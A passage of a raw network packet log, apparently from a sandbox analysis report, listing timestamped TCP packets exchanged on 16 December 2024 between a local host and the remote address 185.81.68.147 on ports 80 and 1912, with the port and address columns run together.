                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.278202057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.278333902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.278433084 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.279145956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.279284954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.279376030 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.279993057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.280107975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.280200005 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.280889988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.280981064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.281066895 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.281765938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.281872988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.281968117 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.282617092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.282743931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.282835007 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.283500910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.283617973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.283710003 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.284410000 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.284537077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.284635067 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.285295010 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.285455942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.285548925 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.286149025 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.286272049 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.286364079 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.287048101 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.287137032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.287226915 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.287911892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.288121939 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.288233995 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.288876057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.288928986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.289016962 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.289621115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.289747000 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.289839029 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.290549040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.290625095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.290714979 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.291433096 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.291557074 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.291646957 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.292354107 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.292483091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.292568922 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.293195009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.293339014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.293447018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.294024944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.294162989 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.294243097 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.294935942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.295073032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.295162916 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.295788050 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.309406996 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.309452057 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.309482098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.309550047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.309596062 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.309665918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.310437918 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.310477972 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.310570955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.311279058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.311321020 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.311353922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.312269926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.312323093 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.312369108 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.313041925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.313082933 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.313129902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.313957930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.314019918 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.314037085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.314737082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.314821959 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.378137112 CET191249729185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.420829058 CET497291912192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.448427916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.448560953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.448764086 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.448818922 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.448947906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.449004889 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.449698925 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.449831009 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.449925900 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.450598955 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.450752020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.450844049 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.451441050 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.451567888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.451661110 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.452320099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.452439070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.452545881 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.453254938 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.453334093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.453440905 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.454124928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.454266071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.454370022 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.454936028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.455071926 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.455180883 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.455882072 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.455948114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.456056118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.456713915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.456783056 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.456888914 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.457578897 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.457667112 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.457770109 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.458502054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.458571911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.458673954 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.459327936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.459450960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.459558010 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.460203886 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.460279942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.460383892 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.461121082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.461260080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.461364031 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.462002039 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.462095976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.462198019 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.462824106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.462954044 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.463057041 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.463735104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.463850021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.463952065 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.464595079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.464713097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.464817047 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.465457916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.465579033 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.465683937 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.466367960 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.466447115 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.466550112 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.467222929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.467401981 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.467504978 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.468100071 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.468296051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.468399048 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.468959093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.469088078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.469192982 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.469854116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.469974041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.470077991 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.470722914 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.470851898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.470959902 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.471633911 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.471734047 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.471839905 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.472528934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.472604990 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.472707033 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.473417997 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.473527908 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.473633051 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.474235058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.474415064 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.474520922 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.475102901 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.475238085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.475344896 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.476073027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.476154089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.476258993 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.476929903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.477025986 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.477129936 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.477713108 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.477832079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.477933884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.478704929 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.478818893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.478925943 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.479564905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.479760885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.479865074 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.480709076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.480760098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.480905056 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.481524944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.481749058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.481854916 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.482300043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.482482910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.482588053 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.483020067 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.483211994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.483319998 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.484010935 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.484092951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.484200001 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.484759092 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.484868050 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.484975100 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.485660076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.485739946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.485842943 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.486532927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.486695051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.486800909 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.487420082 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.487509966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.487610102 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.488281012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.501720905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.501779079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.501822948 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.502068043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.502155066 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.502177954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.502976894 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.503057003 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.503057957 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.503830910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.503914118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.503948927 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.504769087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.504851103 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.504853964 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.505589962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.505676985 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.505757093 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.506546021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.506556988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.506627083 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.559066057 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.640870094 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.640935898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.641055107 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.641271114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.641398907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.641500950 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.642085075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.642143011 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.642246008 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.642896891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.642942905 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.643047094 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.644938946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.645015001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.645028114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.645121098 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.645138979 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.645193100 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.645626068 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.645719051 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.645823002 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.646410942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.646507978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.646610022 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.647213936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.647340059 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.647444010 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.648314953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.648435116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:54.648536921 CET4972380192.168.2.10185.81.68.147
